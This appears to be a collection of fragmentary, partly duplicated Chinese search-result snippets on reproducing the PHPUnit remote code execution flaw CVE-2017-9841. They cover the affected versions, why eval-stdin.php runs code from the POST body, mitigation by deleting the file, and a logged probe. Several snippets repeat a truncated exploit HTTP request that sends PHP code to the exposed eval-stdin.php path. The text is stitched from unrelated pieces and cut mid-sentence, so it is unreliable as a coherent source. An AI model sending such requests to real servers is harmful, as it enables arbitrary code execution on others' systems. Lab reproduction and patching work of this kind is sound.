今天复现phpunit 远程代码执行漏洞(CVE-2017-9841),Composer 是PHP 的包管理工具,安装扩展时会在当前目录创建 vendor 文件夹,建议将其放在 Web 根目录外以避免直接访问。PHPUnit 的 4.8.19 ~ 4.8.27 和 5.0.10 ~ 5.6.2 版本中,vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 包含风险代码: ...
这个漏洞影响了PHPUnit的多个版本,允许攻击者通过发送恶意POST请求来执行任意PHP代码。 4. 漏洞产生原因 CVE-2017-9841:这个漏洞的产生原因是PHPUnit在eval-stdin.php文件中使用了eval函数来执行从php://input流中读取的代码。如果eval-stdin.php文件被暴露在Web可访问的目录中,攻击者就可以通过发送POST请求到该文件,...
问由于phpunit恶意文件eval-stdin.php,cpanel上的80端口被阻止EN作者:13 GitHub:https://github.com...
安装源码时候可以检查一下里面有没有这个文件eval-stdin.php,有则存在远程代码执行漏洞 总体来说就是向vendor/phpunit/src/Util/PHP/eval-stdin.php发送POST请求执行php代码 直接把这个文件删了就行
[01/Jun/2023:18:16:21 +0800] “POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1” 404 47 “-” “PostmanRuntime/7.32.2” 还好都是请求失败的. 查看phpunit/phpunit安装的版本信息命令:composer show phpunit/phpunit .发现是想利用phpunit旧版本的一个漏洞: ...
POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1Host: 127.0.0.1:8080User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept...
直接将PHP代码作为POST Body发送给http://your-ip:8080/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1Host: 127.0.0.1:8080User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0Accept: text/html...
直接将PHP代码作为POST Body发送给http://your-ip:8080/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1Host: 127.0.0.1:8080User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0Accept: text/html...